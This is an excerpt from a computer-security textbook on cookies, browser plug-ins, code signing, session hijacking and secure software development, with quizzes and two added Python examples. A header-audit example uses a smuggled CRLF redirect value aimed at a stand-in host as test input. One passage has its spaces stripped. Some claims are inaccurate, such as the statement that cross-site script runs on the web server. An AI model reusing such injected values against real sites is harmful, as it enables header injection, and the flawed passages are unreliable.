A cookie is actually a series of name-value pairs that is stored in memory during a browser instance. The specification for cookies established several specific name-value pairs for defined purposes. Additional name-value pairs may be defined at will by a developer. The specified set of name-value pairs includes the following:
Expires: This field specifies when the cookie expires. If no value exists, the cookie is good only during the current browser session and will not be persisted to the user's hard drive. Should a value be given, the cookie will be written to the user's machine and persisted until this datetime value occurs.
Domain: Specifies the domain where the cookie is used. Cookies were designed as memory-resident objects, but as the user or data can cause a browser to move between domains, say from comedy.net to jokes.org, some mechanism needs to tell the browser which cookies belong to which domains.
Path: This name-value pair further resolves the applicability of the cookie into a specific path within a domain. If path=/directory, the cookie will be sent only for requests within /directory on the given domain. This allows a level of granular control over the information being passed between the browser and server, and it limits unnecessary data exchanges.
Secure: The presence of the keyword [secure] in a cookie indicates that it is to be sent only when connected in an SSL/TLS session. This does not indicate any other form of security, as cookies are stored in plaintext on the client machine. (Later browsers added a companion attribute, HttpOnly, which keeps the cookie out of reach of scripts running in the page; it is the usual setting for session identifiers.) Cookie management on a browser is normally an invisible process, but most browsers have methods for users to examine and manipulate cookies on the client side. Chrome users can examine, delete, and block individual cookies through the interface shown in Figure 17.11. Internet Explorer has a similar interface, with just a Delete option in the browser under Browsing History (see Figure 17.12). Additional cookie manipulation can be done through the file processing system, because cookies are stored as individual files, as shown in Figure 17.13. This combination allows easier bulk manipulation, which is a useful option, as cookies can become quite numerous in short order.
• Figure 17.11 Chrome cookie management
• Figure 17.12 Internet Explorer cookie management
• Figure 17.13 Internet Explorer cookie store
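The four attributes listed above (Expires, Domain, Path, Secure) are rules the browser applies on every request to decide which cookies to attach. The following is an added example, not code from the textbook: a small cookie jar that parses Set-Cookie header values and applies those rules (plus HttpOnly, which the text does not cover, and the RFC 6265 default-path and domain-must-cover-origin rules). The headers, host names and URLs are constructed; `sid` is deliberately a session token set without the Secure flag, so the example shows it being attached to a plain http:// request while its Secure twin is withheld.

```python
"""A minimal cookie jar applying Expires/Domain/Path/Secure rules (added example)."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit


def default_path(request_path):
    """RFC 6265 default path: the request path up to its last '/', else '/'."""
    if not request_path.startswith("/") or request_path.count("/") == 1:
        return "/"
    return request_path[:request_path.rfind("/")]


def parse_set_cookie(header, request_host, request_path):
    """Parse one Set-Cookie value into a dict.

    No Domain attribute means host-only (exact host match). A Domain that does
    not cover the setting host is rejected, so a page on example.test cannot
    plant cookies for some other site.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(),
              "domain": request_host.lower(), "host_only": True,
              "path": default_path(request_path), "expires": None,
              "secure": False, "httponly": False}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "expires":
            cookie["expires"] = parsedate_to_datetime(val)  # aware UTC datetime
        elif key == "domain" and val:
            d = val.lstrip(".").lower()
            if not (request_host == d or request_host.endswith("." + d)):
                raise ValueError("Domain=%s does not cover %s" % (d, request_host))
            cookie["domain"], cookie["host_only"] = d, False
        elif key == "path" and val.startswith("/"):
            cookie["path"] = val
        elif key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
    return cookie


def domain_matches(host, cookie):
    if cookie["host_only"]:
        return host == cookie["domain"]
    return host == cookie["domain"] or host.endswith("." + cookie["domain"])


def path_matches(request_path, cookie_path):
    """/account matches /account and /account/x but not /accounts."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def cookies_for(jar, url, now=None):
    """Names of the cookies the browser would attach to a request for url.

    Expired cookies are dropped. Secure cookies never leave over plain http,
    which is exactly what a side-jacker sniffing the wire hopes is missing.
    """
    now = now or datetime.now(timezone.utc)
    parts = urlsplit(url)
    host, path, https = parts.hostname.lower(), parts.path or "/", parts.scheme == "https"
    sent = []
    for c in jar:
        if c["expires"] is not None and c["expires"] <= now:
            continue
        if not domain_matches(host, c) or not path_matches(path, c["path"]):
            continue
        if c["secure"] and not https:
            continue
        sent.append(c["name"])
    return sent


# Constructed headers as a shop at https://shop.example.test/account/login
# might set them. 'sid' is the dangerous one: a session token without Secure.
ORIGIN_HOST, ORIGIN_PATH = "shop.example.test", "/account/login"
HEADERS = [
    "sid=7f3a9c; Path=/; HttpOnly",
    "sid_tls=7f3a9c; Path=/; Secure; HttpOnly",
    "zip=30301; Domain=example.test; Path=/; Expires=Wed, 09 Jun 2021 10:18:14 GMT",
    "pref=dark",
]
JAR = [parse_set_cookie(h, ORIGIN_HOST, ORIGIN_PATH) for h in HEADERS]

if __name__ == "__main__":
    print(cookies_for(JAR, "http://shop.example.test/cart"))
```

Run as a script it prints `['sid', 'zip']` for a plain-http request: the unprotected session token goes out in the clear, the Secure one stays home, and `pref`, which got the default path `/account`, is not relevant to `/cart` at all.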
So what good are cookies? Disable cookies in your browser and go to some common sites that you visit, and you'll quickly learn the usefulness of cookies. Cookies store a variety of information, from customer IDs to data about previous visits. Because cookies are stored on a user's machine in a form that will allow simple manipulation, they must always be considered suspect and are not suitable for use as a security mechanism. They can, however, allow the browser to provide crucial pieces of information to a web server. Advertisers can use them to control which ads you are shown, based on previous ads you have viewed and regardless of ad location by site. Specific sites can use cookies to pass state information between pages, enabling functionality at the user's desired levels. Cookies can also remember your ZIP code for a weather site, your ID for a stock tracker site, the items in your shopping cart; these are all typical cookie uses. In the final analysis, cookies are a part of the daily web experience, here to stay and useful if not used improperly (such as to store security data and to provide ID and authentication).
Disabling Cookies
If the user disables cookies in a browser, this type of information will not be available for the web server to use. IETF RFC 2109 (since superseded by RFC 6265, which describes cookies as browsers actually implement them) describes the HTTP state-management system (cookies) and specifies several specific cookie functions to be enabled in browsers, specifically:
The ability to turn on and off cookie usage
An indicator as to whether cookies are in use
A means of specifying cookie domain values and lifetimes
Several of these functions have already been discussed, but to surf cookie-free requires more than a simple step. Telling a browser to stop accepting cookies is a setup option available through an Options menu, but this has no effect on cookies already received and stored on the system. To prevent the browser from sending cookies already received, the user must delete the cookies from the system. This bulk operation is easily performed, and then the browser can run cookie-free. Several third-party tools enable even a finer granularity of cookie control.
Browser Plug-ins
The addition of browser scripting and ActiveX components allows a browser to change how it handles data, tremendously increasing its functionality as a user interface. But all data types and all desired functionality cannot be offered through these programming technologies. Plug-ins are used to fill these gaps. Plug-ins are small application programs that increase a browser's ability to handle new data types and add new functionality. Sometimes these plug-ins are in the form of ActiveX components, which is the form Microsoft chose for its Office plug-in, which enables a browser to manipulate various Office files, such as pivot tables from Excel, over the Web. Adobe has developed Acrobat Reader, a plug-in that enables a browser to read and display Portable Document Format (PDF) files directly in a browser. PDF files offer platform independence for printed documents and are usable across a wide array of platforms; they are a compact way to provide printed information. Figure 17.14 illustrates the various plug-ins and browser helper objects (discussed in the next section) enabled in Internet Explorer.
• Figure 17.14 Add-ons for Internet Explorer
The combination of a development environment for developers and plug-in-enabled browsers that can display the content has caused these technologies to see widespread use. The result is a tremendous increase in visual richness in web communications, and this, in turn, has made the Web more popular and has increased usage in various demographic segments. For a time, these plug-ins had a remarkable safety record. As Flash-based content grew more popular, crackers examined the Flash plug-ins and software, determined vulnerabilities, and developed exploit code to use against the Flash player. Adobe patched each issue as it was found, but with Apple refusing to ship Flash on its iPhones or iPads, the death of Flash was on the horizon; Adobe ended support for Flash Player at the close of 2020.
Malicious Add-ons
Add-ons are pieces of code that are distributed to allow additional functionality to be added to an existing program. An example of these are browser helper objects (BHOs), which provide a means of creating a plug-in module that is loaded with Internet Explorer and provide a means of adding capability to the browser. The functionality can be significant, as in the case of the Adobe Acrobat BHO that allows PDFs to be rendered in the browser. A BHO has unrestricted access to the Internet Explorer event model and can do things such as capture keystrokes.
Tech Tip
Browser Malware
The circumvention of browser functionality is a common form of malware. Browser malware exploits security vulnerabilities in the browser itself, its extensions, and plug-ins.
Other programs can have add-ons that utilize the permissions given the master program. You should only use add-ons from trusted sources, and you need to understand the level of interaction risk they pose. ActiveX is a technology implemented by Microsoft to enhance web-enabled systems through significant additions to user controls. For example, unless signed by a trusted authority using Authenticode, ActiveX content should not be allowed in browsers, as the nature of the code changes can present significant risk.
Signed Applets
Code signing was an attempt to bring the security of shrink-wrapped software to software downloaded from the Internet. Code signing works by adding a digital signature and a digital certificate to a program file to demonstrate file integrity and authenticity. The certificate identifies the author and binds the signing key to that identity; the digital signature is computed over a hash of the code, so any change to the code after signing breaks the signature. A browser verifies the signature against the key in the certificate and the certificate against a trusted root, and this establishes the integrity of the code and the identity of the publisher via a standard certificate check. The purpose of a company signing the code is to state that it considers the code it created to be safe, and it is stating that the code will not do any harm to the system (to the company's knowledge). The digital signature also tells the user that the stated company is, indeed, the creator of the code. The ability to use a certificate to sign an applet or a control allows the identity of the author of a control or applet to be established. This has many benefits. For instance, if a user trusts content from a particular vendor, such as Sun Microsystems, the user can trust controls that are signed by Sun Microsystems. This signing of a piece of code does not do anything other than identify the code's manufacturer and guarantee that the code has not been modified since it was signed. A signed applet can be hijacked as easily as a graphic or any other file.
The two ways an attacker could hijack a signed control are by inline access or by copying the file in its entirety and republishing it. Inlining is using an embedded control from another site with or without the other site's permission. Republishing a signed control is done much like stealing a GIF or JPEG image: a copy of the file is maintained on the unauthorized site and served from there instead of from the original location. If a signed control cannot be modified, why be concerned with these thefts, apart from the issue of intellectual property? The primary security concern comes from how the control is used. A cracker may be able to use a control in an unintended fashion, resulting in file loss or buffer overflow, conditions that weaken a system and can allow exploitation of other vulnerabilities. A common programming activity is cleaning up installation files from a computer's hard drive after successfully installing a software package. If a signed control is used for this task and permission has already been granted, then improperly using the control could result in the wrong set of files being deleted. The control will still function as designed, but the issue becomes who it is used by and how. These are concerns not addressed simply by signing a control or applet.
Application-Based Weaknesses
Web browsers are not the only aspect of software being abused by crackers. The application software written to run on servers and serve up the content for users is also a target. Web application security is a fairly hot topic in security, as it has become a prime target for professional crackers. Criminal hackers typically are after some form of financial reward, whether from stolen data, stolen identity, or some form of extortion. Attacking web-based applications has proven to be a lucrative venture for several reasons. First, the target is a rich environment, as company after company has developed a customer-facing web presence, often including custom-coded functionality that permits customer access to back-end systems for legitimate business purposes. Second, building these custom applications to high levels of security is a difficult if not impossible feat, especially given the corporate pressure on delivery time and cost.
Cross Check
Common Application Vulnerabilities
There are some common application vulnerabilities that hackers use to attack web sites, including injection attacks, cross-site request forgeries, cross-site scripting attacks, and numeric attacks. These are attacks that use the browser's ability to submit input to a back-end server program, and they take advantage of coding errors on the back-end system, enabling behavior outside the desired program response. These errors are covered in more detail in Chapter 18, as they are fundamentally programming errors on the server side.
The same programmatic errors that plague operating systems, such as buffer overflows, can cause havoc with web-based systems. But web-based systems have a new history of rich customer interactions, including the collection of information from the customer and dynamically using customer-supplied information to modify the user experience. This makes the customer a part of the application, and when proper controls are not in place, errors such as the MySpace-based Samy worm can occur. Different types of errors are commonly observed in the deployment of web applications, and these have been categorized into six logical groupings of vulnerabilities: authentication, authorization, logical attacks, information disclosure, command execution, and client-side attacks. A total of 24 different types of vulnerabilities have been classified by the Web Application Security Consortium (WASC), an international organization that establishes best practices for web application security. The changing nature of the web-based vulnerabilities is demonstrated by the changing of the OWASP Top Ten list of web application vulnerabilities maintained by The Open Web Application Security Project. OWASP is a worldwide free and open community focused on improving the security of application software and has published a series of Top Ten vulnerability lists highlighting the current state of the art and threat environment facing web application developers. OWASP maintains a web site (www.owasp.org) with significant resources to help firms build better software and eliminate these common and pervasive problems. The true challenge in this area is not just about coding, but also about developing an understanding of the nature of web applications and the difficulty of using user-supplied inputs for crucial aspects in a rich, user experience-based web application. The errors included in the OWASP Top Ten list have plagued some of the largest sites and those with arguably the best talent, including Amazon, eBay, MySpace, and Google.
SessionHijackingWhencommunicatingacrosstheWeb,itiscommontocreateasessiontocontrolcommunicationflows.Sessionscanbeestablishedandcontrolledusingavarietyofmethods,includingSSL/TLSandcookies.Itisimportanttosecurelyimplementthesetupandteardownofasession,forifonepartyendsthecommunicationwithoutproperlytearingdownthecommunicationsession,aninterlopercantakeoverthesession,continueafteroneofthepartieshasleft,andimpersonatethatparty.Ifyoulogintoyourbanktoconducttransactions,butallowasessionhijackerin,thenthehijackercancontinuebankingafteryouleave,usingyouraccount.Thisisoneofthereasonsitissoimportanttologoffofbankingandfinancialsites,ratherthanjustclosingthebrowser.Therearenumerousmethodsofsessionhijacking,fromman-in-the-
middleattackstoside-jackingandbrowsertakeovers.Side-jackingistheuseofpacketsniffingtostealasessioncookie.SecuringonlythelogonprocessandthenswitchingbacktostandardHTTPcanenablethisattackmethodology.Thebestdefensesaretouseencryptioncorrectly(TLS,notSSL)andto
logoutofandcloseapplicationswhendone.Whenusingmultitabbedbrowsers,itisbesttoclosetheentirebrowserinstance,notjustthetab.
Client-SideAttacksThewebbrowserhasbecomethemajorapplicationforuserstoengageresourcesacrosstheWeb.Thepopularityandtheutilityofthisinterfacehavemadethewebbrowseraprimetargetforattackerstogainaccessand
controloverasystem.Awidevarietyofattackscanoccurviaabrowser,typicallyresultingfromafailuretoproperlyvalidateinputbeforeuse.Unvalidatedinputcanresultinaseriesofinjectionattacks,headermanipulation,andotherformsofattack.
Cross-SiteScriptingAcross-sitescriptingattackisacodeinjectionattackinwhichanattackersendscodeinresponsetoaninputrequest.Thiscodeisthenrenderedbythewebserver,resultingintheexecutionofthecodebythewebserver.Cross-sitescriptingattackstakeadvantageofafewcommonelementsinweb-basedsystems.Cross-sitescriptingiscoveredindetailinChapter18.
HeaderManipulationsWhenHTTPisbeingdynamicallygeneratedthroughtheuseofuserinputs,unvalidatedinputscangiveattackersanopportunitytochangeHTTPelements.Whenuser-suppliedinformationisusedinaheader,itispossibletocreateavarietyofattacks,includingcachepoisoning,cross-sitescripting,cross-userdefacement,pagehijacking,cookiemanipulation,andopenredirect.
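Both the side-jacking risk described under Session Hijacking (a session cookie that the browser will also send over plain HTTP) and the header risks in this paragraph can be caught by auditing the headers a server emits. The following is an added example, not code from the book; the session cookie names, the trusted host list and the sample headers are assumptions constructed for illustration.

```python
"""Response-header audit for the side-jacking and header-manipulation risks
described above.  Added example, not code from the book; the sample headers
and the session cookie names are constructed for illustration."""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Cookie names assumed to carry the session identifier (adjust to the app).
SESSION_COOKIE_NAMES = {"sessionid", "jsessionid", "phpsessid"}


def audit_set_cookie(value: str) -> list[str]:
    """Findings for one Set-Cookie value.

    Without the Secure attribute the browser also sends the cookie on plain
    HTTP requests to the same host, which is exactly what side-jacking sniffs
    for once the site drops back from HTTPS after login.  Without HttpOnly,
    script injected into the page can read it."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    findings = []
    if name.lower() in SESSION_COOKIE_NAMES:
        if "secure" not in attrs:
            findings.append(f"{name}: session cookie lacks Secure (side-jacking)")
        if "httponly" not in attrs:
            findings.append(f"{name}: session cookie lacks HttpOnly")
    return findings


def audit_location(value: str, trusted_hosts: set[str]) -> list[str]:
    """Findings for one Location value that was built from user input.

    A CR or LF in the value ends the header early, so the rest of the input
    is emitted as further headers or body (cookie manipulation, cache
    poisoning); an absolute URL on another host is an open redirect."""
    findings = []
    if re.search(r"[\r\n]", value):
        findings.append("Location: CR/LF in value (header injection)")
    target = urlsplit(re.split(r"[\r\n]", value, maxsplit=1)[0])
    if target.scheme or target.netloc:
        host = (target.hostname or "").lower()
        if host not in trusted_hosts:
            findings.append(f"Location: redirect to untrusted host {host!r} (open redirect)")
    return findings


def audit_response(headers: list[tuple[str, str]], trusted_hosts: set[str]) -> list[str]:
    """Run both checks over (name, value) header pairs."""
    findings = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            findings.extend(audit_set_cookie(value))
        elif name.lower() == "location":
            findings.extend(audit_location(value, trusted_hosts))
    return findings


if __name__ == "__main__":
    # Constructed sample: login was over HTTPS, but the session cookie has no
    # Secure flag and a user-supplied "next" parameter reached Location unchecked.
    weak = [
        ("Set-Cookie", "sessionid=abc123; Path=/"),
        ("Location", "http://evil.example/\r\nX-Injected: yes"),
    ]
    for finding in audit_response(weak, {"bank.example"}):
        print(finding)
```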
Exam Tip: A wide variety of attack vectors can be used against a client machine, including cache poisoning, cross-site scripting, cross-user defacement, page hijacking, cookie manipulation, and open redirect. All attacks should be known for the exam.

Web 2.0 and Security

A relatively new phenomenon has swept the Internet, Web 2.0, a collection of technologies that is designed to make websites more useful for users. From new languages and protocols, such as AJAX, to user-provided content, to social networking sites and user-created mash-ups, the Internet has changed dramatically from its static HTML roots. There is a wide range of security issues associated with this new level of deployed functionality. The new languages and protocols add significant layers of complexity to a website’s design, and errors can have significant consequences. Early efforts by Google to add Web 2.0 functionality to its applications created holes that allowed hackers access to a logged-in user’s Gmail account and password. Google has fixed these errors, but they illustrate the dangers of rushing into new functionality without adequate testing. The fine details of Web 2.0 security concerns are far too numerous to detail here—in fact, they could comprise their own book. The important thing to remember is that the foundations of security apply the same way in Web 2.0 as they do elsewhere. In fact, with more capability and greater complexity comes a greater need for strong foundational security efforts, and Web 2.0 is no exception.

Chapter 17 Review

Lab Manual Exercise

The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:

Lab 5.2m Web Browser Exploits

Chapter Summary

After reading this chapter and completing the exercises, you should understand the following about web components.

Describe the functioning of the SSL/TLS protocol suite
• SSL and TLS use a combination of symmetric and asymmetric cryptographic methods to secure traffic.
• Before an SSL session can be secured, a handshake occurs to exchange cryptographic information and keys.

Explain web applications, plug-ins, and associated security issues
• Web browsers have mechanisms to enable plug-in programs to manage applications such as Flash objects and videos.
• Firefox has a NoScript helper that blocks scripts from functioning.
• Plug-ins that block pop-up windows and phishing sites can improve end-user security by permitting greater control over browser functionality.

Describe secure file transfer options
• FTP operations occur in plaintext, allowing anyone who sees the traffic to read it.
• SFTP combines the file transfer application with the Secure Shell (SSH) application to provide for a means of confidential FTP operations.

Explain directory usage for data retrieval
• LDAP is a protocol describing interaction with directory services.
• Directory services are data structures optimized for retrieval and are commonly used where data is read many times more than written, such as ACLs.

Explain scripting and other Internet functions that present security concerns
• Scripts are pieces of code that can execute within the browser environment.
• ActiveX is a robust programming language that acts like a script in Microsoft Internet Explorer browsers to provide a rich programming environment.
• Some scripts or code elements can be called from the server side, creating the web environment of ASP.NET and PHP.

Use cookies to maintain parameters between web pages
• Cookies are small text files used to maintain state between web pages.
• Cookies can be set for persistent (last for a defined time period) or session (expire when the session is closed).

Examine web-based application security issues
• As more applications move to a browser environment to ease programmatic deployment, it makes it easier for users to work with a familiar user environment.
• Browsers have become powerful programming environments that perform many actions behind the scenes for a user, and malicious programmers can exploit this hidden functionality to perform actions on a user’s PC without the user’s obvious consent.

Key Terms

Active Server Pages (ASP) (547), ActiveX (545), ASP.NET (547), Authenticode (545), buffer overflow (542), code signing (551), Common Gateway Interface (CGI) (546), cookie (547), File Transfer Protocol (FTP) (540), Hypertext Markup Language (HTML) (530), inlining (552), Internet Engineering Task Force (IETF) (532), Java (542), JavaScript (544), Lightweight Directory Access Protocol (LDAP) (539), PHP (547), plug-in (550), Secure Sockets Layer (SSL) (531), server-side scripting (547), SSL stripping attack (538), Transport Layer Security (TLS) (532), Uniform Resource Locator (URL) (530), X.500 (539)

Key Terms Quiz

Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.

1. The use of _______________ can validate input responses from clients and prevent certain attack methodologies.
2. A(n) _______________ is a small text file used to enhance web surfing by creating a link between pages visited on a website.
3. _______________ or _______________ is a technology used to support confidentiality across the Internet for websites.
4. A(n) _______________ is a small application program that increases a browser’s ability to handle new data types and add new functionality.
5. An application-level protocol that operates over a wide range of lower-level protocols and is used to transfer files is _______________.
6. _______________ files have the .ocx extension to identify them.
7. _______________ is the standard for directory services.
8. Adding a digital signature and a digital certificate to a program file to demonstrate file integrity and authenticity is _______________.
9. A(n) _______________ is a descriptor where content is located on the Internet.
10. _______________ is a system that uses digital signatures and allows Windows users to determine who produced a specific piece of code and whether or not the code has been altered.

Multiple-Choice Quiz

1. What is a cookie?
A. A piece of data in a database that enhances web browser capability
B. A small text file used in some HTTP exchanges
C. A segment of script to enhance a web page
D. A program that runs when you visit a website so it remembers you

2. The use of certificates in SSL/TLS is similar to:
A. A receipt proving purchase
B. Having a notary notarize a signature
C. A historical record of a program’s lineage
D. None of the above

3. Security for JavaScript is established by whom?
A. The developer at the time of code development.
B. The user at the time of code usage.
C. The user through browser preferences.
D. Security for JavaScript is not necessary—the Java language is secure by design.

4. ActiveX can be used for which of the following purposes?
A. Add functionality to a browser
B. Update the operating system
C. Both A and B
D. Neither A nor B

5. The keyword [secure] in a cookie:
A. Causes the system to encrypt its contents
B. Prevents the cookie from passing over HTTP connections
C. Tells the browser that the cookie is a security upgrade
D. None of the above

6. Code signing is used to:
A. Allow authors to take artistic credit for their hard work
B. Provide a method to demonstrate code integrity
C. Guarantee code functionality
D. Prevent copyright infringement by code copying

7. SSL provides which of the following functionality?
A. Data integrity services
B. Authentication services
C. Data confidentiality services
D. All of the above

8. High-security browsers can use what to validate SSL credentials for a user?
A. AES encrypted links to a root server
B. An extended-validation SSL certificate
C. MD5 hashing to ensure integrity
D. SSL v3.0

9. To establish an SSL connection for e-mail and HTTP across a firewall, you must:
A. Open TCP ports 80, 25, 443, and 223.
B. Open TCP ports 443, 465, and 995.
C. Open a TCP port of choice and assign it to all SSL traffic.
D. Do nothing; SSL tunnels past firewalls.

10. To prevent the use of cookies in a browser, a user must:
A. Tell the browser to disable cookies via a setup option.
B. Delete all existing cookies.
C. Both A and B.
D. The user need do nothing; by design, cookies are necessary and cannot be totally disabled.

Essay Quiz

1. Much has been made of the new Web 2.0 phenomenon, including social networking sites and user-created mash-ups. How does Web 2.0 change security for the Internet?

Lab Project

• Lab Project 17.1 Cookies and scripts can both enhance web browsing experiences. They can also represent a risk, and as such the option exists to turn them off. Using Firefox with the NoScript plug-in to disable scripts, compare the browsing experience at the following sites with and without cookies, and with and without scripts:
An e-commerce site like Amazon
A bank
An information site like Wikipedia
A news site

Chapter 18 Secure Software Development

Security Features != Secure Features
—MICHAEL HOWARD, MICROSOFT CORPORATION

In this chapter, you will learn how to
• Describe how secure coding can be incorporated into the software development process
• List the major types of coding errors and their root causes
• Describe good software development practices and explain how they impact application security
• Describe how using a software development process enforces security inclusion in a project
• Learn about application hardening techniques

Software engineering is the systematic development of software to fulfill a variety of functions, such as business, recreational, scientific, and educational functions, which are just a few of the many areas where software comes in handy. Regardless of the type of software, there is a universal requirement that the software work properly, perform the desired functions, and perform them in the correct fashion. The functionality of software ranges from spreadsheets that accurately add figures, to pacemakers that stimulate the heart. Developers know that functional specifications must be met for the software to be satisfactory. Software engineering, then, fits as many requirements as possible into the project management schedule timeline. But with analysts and developers working overtime to get as many functional elements correct as possible, the issue of nonfunctional requirements often gets pushed to the back burner, or neglected entirely. Security has been described as a nonfunctional requirement. This places it into a category of secondary importance for many developers. Their view is that if timelines, schedules, and budgets are all in the green, then maybe there will be time to devote to security programming. As we depend more and more on computers driven by software, we will need systems to do the same—to not only function now, but to be protected from malfunction in the future.

The Software Engineering Process

Software does not build itself. This is good news for software designers, analysts, programmers, and the like, for the complexity of designing and building software enables them to engage in well-paying careers. To achieve continued success in this difficult work environment, software engineering processes have been developed. Rather than just sitting down and starting to write code at the onset of a project, software engineers use a complete development process. There are several major categories of software engineering processes. The waterfall model, the spiral model, and the evolutionary model are major examples. Within each of these major categories, there are numerous variations, and each group then personalizes the process to their project requirements and team capabilities.

This chapter contains many details of how to test for exploitable vulnerabilities in software. Do not perform or attempt these steps outside of systems for which you either are, or have explicit permission from, the owner. Otherwise, you may find yourself being accused of hacking and possibly even facing legal charges.

Traditionally, security is an add-on item that is incorporated into a system after the functional requirements have been met. It is not an integral part of the software development lifecycle process. This places it at odds with both functional and lifecycle process requirements. The resolution to all of these issues is relatively simple: incorporate security into the process model and build it into the product along with each functional requirement. The challenge is in how to accomplish this goal. There are two separate and required elements needed to achieve this objective. First, the inclusion of security requirements and measures in the specific process model being used. Second, the use of secure coding methods to prevent opportunities to introduce security failures into the software’s design.

Process Models

There are several major software engineering process models, each with slightly different steps and sequences, yet they all have many similar items. The waterfall model is characterized by a multistep process in which steps follow each other in a linear, one-way fashion, like water over a waterfall. The spiral model has steps in phases that execute in a spiral fashion, repeating at different levels with each revolution of the model. The agile model is characterized by iterative development, where requirements and solutions evolve through an ongoing collaboration between self-organizing cross-functional teams. The evolutionary model is an iterative model designed to enable the construction of increasingly complex versions of a project. There are numerous other models and derivations in use today. The details of these process models are outside the scope of this book, and most of the detail is not significantly relevant to the issue of security. From a secure coding perspective, a secure development lifecycle (SDL) model is essential to success. From requirements to system architecture to coding to testing, security is an embedded property in all aspects of the process. There are several specific items of significance with respect to security. Four primary items of interest, regardless of the particular model or methodology employed in software creation, are the requirements, design, coding, and testing phases. These phases are described in the following section.

Secure Development Lifecycle

There may be as many different software engineering methods as there are software engineering groups. But an analysis of these methods indicates that most share common elements from which an understanding of a universal methodology can be obtained. For decades, secure coding—that is, creating code that does what it is supposed to do, and only what it is supposed to do—has not been high on the radar for most organizations. The past decade of explosive connectivity and the rise of malware and hackers have raised awareness of this issue significantly. A recent alliance of several major software firms concerned with secure coding principles revealed several interesting patterns. First, they were all attacking the problem using different methodologies, yet in surprisingly similar fashions. Second, they found a series of principles that appears to be related to success in this endeavor. First and foremost, recognition of the need to include secure coding principles in the development process is a common element among all firms. Microsoft has been very open and vocal about its implementation of its Security Development Lifecycle (SDL) and has published significant volumes of information surrounding its genesis and evolution (https://www.microsoft.com/en-us/sdl/default.aspx). The Software Assurance Forum for Excellence in Code (SAFECode) is an organization formed by some of the leading software development firms with the objective of advancing software assurance through better development methods. SAFECode (www.safecode.org) members include EMC, Microsoft, and Intel. An examination of SAFECode members’ processes reveals an assertion that secure coding must be treated as an issue that exists throughout the development process and cannot be effectively treated at a few checkpoints with checklists. Regardless of the software development process used, the first step down the path to secure coding is to infuse the process with secure coding principles.

Threat Modeling and Attack Surface Area Minimization

Two important tools have come from the secure coding revolution: threat modeling and attack surface area minimization. Attack surface area minimization is a strategy to reduce the places where code can be attacked. The second major design effort is one built around threat modeling, the process of analyzing threats and their potential effects on software in a very finely detailed fashion. The output of the threat model process is a compilation of threats and how they interact with the software. This information is communicated across the design and coding team, so that potential weaknesses can be mitigated before the software is released.

Step by Step 18.1

Threat Modeling Steps

Follow the steps used to conduct threat modeling.

Requirements Phase

The requirements phase should define the specific security requirements if there is any expectation of them being designed into the project. Regardless of the methodology employed, the process is all about completing the requirements. Secure coding does not refer to adding security functionality into a piece of software. Security functionality is a standalone requirement. The objective of the secure coding process is to properly implement this and all other requirements, so that the resultant software performs as desired and only as desired. The requirements process is a key component of security in software development. Security-related items enumerated during the requirements process are visible throughout the rest of the software development process. They can be architected into the systems and subsystems, addressed during coding, and tested. For the subsequent steps to be effective, the security requirements need to be both specific and positive. Requirements such as “make secure code” or “no insecure code” are nonspecific and not helpful in the overall process. Specific requirements such as “prevent unhandled buffer overflows and unhandled input exceptions” can be specifically coded for in each piece of code.

Tech Tip

Common Secure Coding Requirements

Common secure coding requirements include:
• Analysis of security and privacy risk
• Authentication and password management
• Audit logging and analysis
• Authorization and role management
• Code integrity and validation testing
• Cryptography and key management
• Data validation and sanitization
• Network and data security
• Ongoing education and awareness
• Team staffing requirements
• Third-party component analysis

During the requirements activity, it is essential that the project/program manager and any business leaders who set schedules and allocate resources are aware of the need and requirements of the secure development process. The cost of adding security at a later time rises exponentially, with the most expensive form being the common release-and-patch process used by many firms. The development of both functional and nonfunctional security requirements occurs in tandem with other requirements through the development of use cases, analysis of customer inputs, implementation of company policies, and compliance with industry best practices. Depending on the nature of a particular module, special attention may be focused on sensitive issues such as personally identifiable information (PII), sensitive data, or intellectual property data. One of the outputs of the requirements phase is a security document that helps guide the remaining aspects of the development process, ensuring that secure code requirements are being addressed. These requirements can be infused into design, coding, and testing, ensuring they are addressed throughout the development process.

Design Phase

Coding without designing first is like building a house without using plans. This might work fine on small projects, but as the scope grows, so do complexity and the opportunity for failure. Designing a software project is a multifaceted process. Just as there are many ways to build a house, there are many ways to build a program. Design is a process involving trade-offs and choices, and the criteria used during the design decisions can have lasting impacts on program construction. There are two secure coding principles that can be applied during the design phase that can have a large influence on the code quality. The first of these is the concept of minimizing attack surface area. Reducing the avenues of attack available to a hacker can have obvious benefits. Minimizing attack surface area is a concept that tends to run counter to the way software has been designed—most designs come as a result of incremental accumulation, adding features and functions without regard to maintainability.

Coding Phase

The point at which the design is implemented is the coding step in the software development process. The act of instantiating an idea into code is a point where an error can enter the process. These errors are of two types: the failure to include desired functionality, and the inclusion of undesired behavior in the code. Testing for the first type of error is relatively easy if the requirements are enumerated in a previous phase of the process. Testing for the inclusion of undesired behavior is significantly more difficult. Testing for an unknown is a virtually impossible task. What makes this possible at all is the concept of testing for categories of previously determined errors. Several classes of common errors have been observed. Enumerations of known software weaknesses and vulnerabilities have been compiled and published as the Common Weakness Enumeration (CWE) and Common Vulnerabilities and Exposures (CVE) by the MITRE Corporation, a government-funded research group (www.mitre.org). These enumerations have enabled significant advancement in the development of methods to reduce code vulnerabilities. The CVE and CWE are vendor- and language-neutral methods of describing errors. These enumerations allow a common vocabulary for communication about weaknesses and vulnerabilities. This common vocabulary has also led to the development of automated tools to manage the tracking of these issues. There are many common coding errors, but some of the primary and most damaging are least privilege violations and cryptographic failures. Language-specific failures are another common source of vulnerabilities.

